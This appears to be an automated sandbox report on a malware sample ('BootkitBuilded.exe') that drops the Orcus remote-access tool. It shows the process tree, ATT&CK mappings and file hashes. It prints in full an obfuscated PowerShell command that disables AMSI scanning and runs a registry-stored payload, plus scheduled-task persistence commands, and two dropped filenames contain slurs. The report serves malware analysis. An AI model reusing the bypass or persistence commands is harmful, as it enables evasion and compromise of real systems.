C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1936

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2444

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1200

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3320
- C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe
  "C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5360
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:352
- - C:\Users\Admin\AppData\Local\Temp\$77nigga.exe
    "C:\Users\Admin\AppData\Local\Temp\$77nigga.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4840
  - - C:\Users\Admin\AppData\Roaming\notfud\notfud.exe
      "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4624
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3012
- - C:\Users\Admin\AppData\Local\Temp\jew.exe
    "C:\Users\Admin\AppData\Local\Temp\jew.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:764
  - - C:\Program Files (x86)\Orcus\Orcus.exe
      "C:\Program Files (x86)\Orcus\Orcus.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:5324
    - - C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /launchSelfAndExit "C:\Program Files (x86)\Orcus\Orcus.exe" 5324 /protectFile
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:464
      - C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /watchProcess "C:\Program Files (x86)\Orcus\Orcus.exe" 5324 "/protectFile"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Orcus\Orcus.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2760
- - C:\Program Files (x86)\Orcus\Orcus.exe
    "C:\Program Files (x86)\Orcus\Orcus.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3884

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:796

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1344

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4040

C:\Windows\system32\cmd.exe
cmd.exe /c "powershell.exe -Command ""function Local:dpcsYwqewvhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KsoigGxliGMRiZ,[Parameter(Position=1)][Type]$dbnkzakihP)$SVgmAUkOXNo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+'r'+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+'s'+'s,'+[Char](80)+'u'+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$SVgmAUkOXNo.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$KsoigGxliGMRiZ).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$SVgmAUkOXNo.DefineMethod('Invo'+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$dbnkzakihP,$KsoigGxliGMRiZ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $SVgmAUkOXNo.CreateType();}$lXgssjUwdnDdn=([AppDomain]::CurrentDomain.GetAssemblies()^|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$WgxfxABIVVNppy=$lXgssjUwdnDdn.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HqXSNFMCLrkDcZSBENe=dpcsYwqewvhq @([String])([IntPtr]);$XBdxjitDqIdPBOBdCbAMnS=dpcsYwqewvhq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lnGkqgDuMie=$lXgssjUwdnDdn.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$LnUUezLhWWpZzn=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$DbcLeGziDLBdtAYlH=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+'r'+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$xmDyuPI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LnUUezLhWWpZzn,$HqXSNFMCLrkDcZSBENe).Invoke('a'+[Char](109)+'s'+'i'+'.'+[Char](100)+''+'l'+'l');$JBVuTDQlAXQFioRcL=$WgxfxABIVVNppy.Invoke($Null,@([Object]$xmDyuPI,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vXklaNIAlL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,4,[ref]$vXklaNIAlL);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](30+101),[Byte](47+187),[Byte](127-127),[Byte](84+100),[Byte](132-45),[Byte](165-165),[Byte](11-4),[Byte](184-56),[Byte](97+34),[Byte](219-27),[Byte](15-15),[Byte](155+40),[Byte](84+53),[Byte](177+33)),0,$JBVuTDQlAXQFioRcL,111-97);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,0x20,[ref]$vXklaNIAlL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+'7'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"""
1⤵
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:5388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command ""function Local:dpcsYwqewvhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KsoigGxliGMRiZ,[Parameter(Position=1)][Type]$dbnkzakihP)$SVgmAUkOXNo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+'r'+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+'s'+'s,'+[Char](80)+'u'+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$SVgmAUkOXNo.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$KsoigGxliGMRiZ).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$SVgmAUkOXNo.DefineMethod('Invo'+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$dbnkzakihP,$KsoigGxliGMRiZ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $SVgmAUkOXNo.CreateType();}$lXgssjUwdnDdn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$WgxfxABIVVNppy=$lXgssjUwdnDdn.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HqXSNFMCLrkDcZSBENe=dpcsYwqewvhq @([String])([IntPtr]);$XBdxjitDqIdPBOBdCbAMnS=dpcsYwqewvhq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lnGkqgDuMie=$lXgssjUwdnDdn.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$LnUUezLhWWpZzn=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$DbcLeGziDLBdtAYlH=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+'r'+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$xmDyuPI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LnUUezLhWWpZzn,$HqXSNFMCLrkDcZSBENe).Invoke('a'+[Char](109)+'s'+'i'+'.'+[Char](100)+''+'l'+'l');$JBVuTDQlAXQFioRcL=$WgxfxABIVVNppy.Invoke($Null,@([Object]$xmDyuPI,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vXklaNIAlL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,4,[ref]$vXklaNIAlL);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](30+101),[Byte](47+187),[Byte](127-127),[Byte](84+100),[Byte](132-45),[Byte](165-165),[Byte](11-4),[Byte](184-56),[Byte](97+34),[Byte](219-27),[Byte](15-15),[Byte](155+40),[Byte](84+53),[Byte](177+33)),0,$JBVuTDQlAXQFioRcL,111-97);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,0x20,[ref]$vXklaNIAlL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+'7'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4396

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5528

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Time Discovery

T1124

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Orcus\Orcus.exe.config

Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Orcus.exe.log

Filesize
1KB

MD5
23095077e59941121be408de05f8843b

SHA1
6a85a4fb6a47e96b4c65f8849647ff486273b513

SHA256
49cc85a6bad5faf998eae8f1156e4a3cdd0273ff30a7828f5545689eb22e3fe5

SHA512
05644cd4aa2128e4c40993e4033ae3102705ee27c157d8376180c81e58b61c2801ca8deed6a256c79bc409e40f9ab5c66e2b2492f6c60871fb575eb6cce73211

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OrcusWatchdog.exe.log

Filesize
425B

MD5
bb27934be8860266d478c13f2d65f45e

SHA1
a69a0e171864dcac9ade1b04fc0313e6b4024ccb

SHA256
85ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4

SHA512
87dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77nigga.exe

Filesize
1.5MB

MD5
ca54187827e3ef0d1b74772e30cc46ea

SHA1
a488e92ca039dc49767299ba6a6b78d27126d839

SHA256
28382a86a4980b9e60284f4f571f8fe64e2fe649d2d5aa64f2d378f8a162bf9e

SHA512
6b2d090b82a425040c3c2733fbcd0d07478a3894c3c8b271586f596d6842fad815a5d40fa46448357633fe0f56adc6c495f4477e9747cbfb2d93219656e2f5d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
164KB

MD5
f036e84b63600df39664d4abbfcabe9a

SHA1
54edc28ad4d2054e73447f3c4f51ca228da92d76

SHA256
e2c2e8828cb743fa822e18be80aa4371b7fee9cae2079f125812d5f04f294c48

SHA512
ffc2ab783f8a1cca32beeca2d2bba4ba657777914b2596673471bc11e42cbe54c2edbce84f2556fe031d6c82ab16c56b7303d44ed471d0c3bbefb7683bc5c3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jew.exe

Filesize
907KB

MD5
29d53eec589f731082b73dadc9050b71

SHA1
57f85307e98dd2ab83947d552d5e8d5553fa1f0a

SHA256
a94393921e9a9280da6c9f354d69b6fd3c64323503465c0c33fe6d030c492c63

SHA512
770e8819852a32f395922a38cb093c5452107d93a6b11bd3b3dd37786680d26c2c740a068f25c1b684a7418f35285ea79ac0359daa7108f407c017a5888f9d9f

Download Submit
C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe

Filesize
9KB

MD5
913967b216326e36a08010fb70f9dba3

SHA1
7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

SHA256
8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

SHA512
c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_c4mxh2nu.1tv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/412-154-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/412-155-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/412-146-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/412-151-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/412-152-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/412-153-0x0000017B81490000-0x0000017B814BB000-memory.dmp

Filesize
172KB

Download
memory/464-233-0x0000000000AA0000-0x0000000000AA8000-memory.dmp

Filesize
32KB

Download
memory/628-100-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

Filesize
32KB

Download
memory/628-102-0x0000021908ED0000-0x0000021908EF5000-memory.dmp

Filesize
148KB

Download
memory/628-111-0x0000021908F00000-0x0000021908F2B000-memory.dmp

Filesize
172KB

Download
memory/628-103-0x0000021908F00000-0x0000021908F2B000-memory.dmp

Filesize
172KB

Download
memory/628-94-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

Filesize
32KB

Download
memory/628-95-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

Filesize
32KB

Download
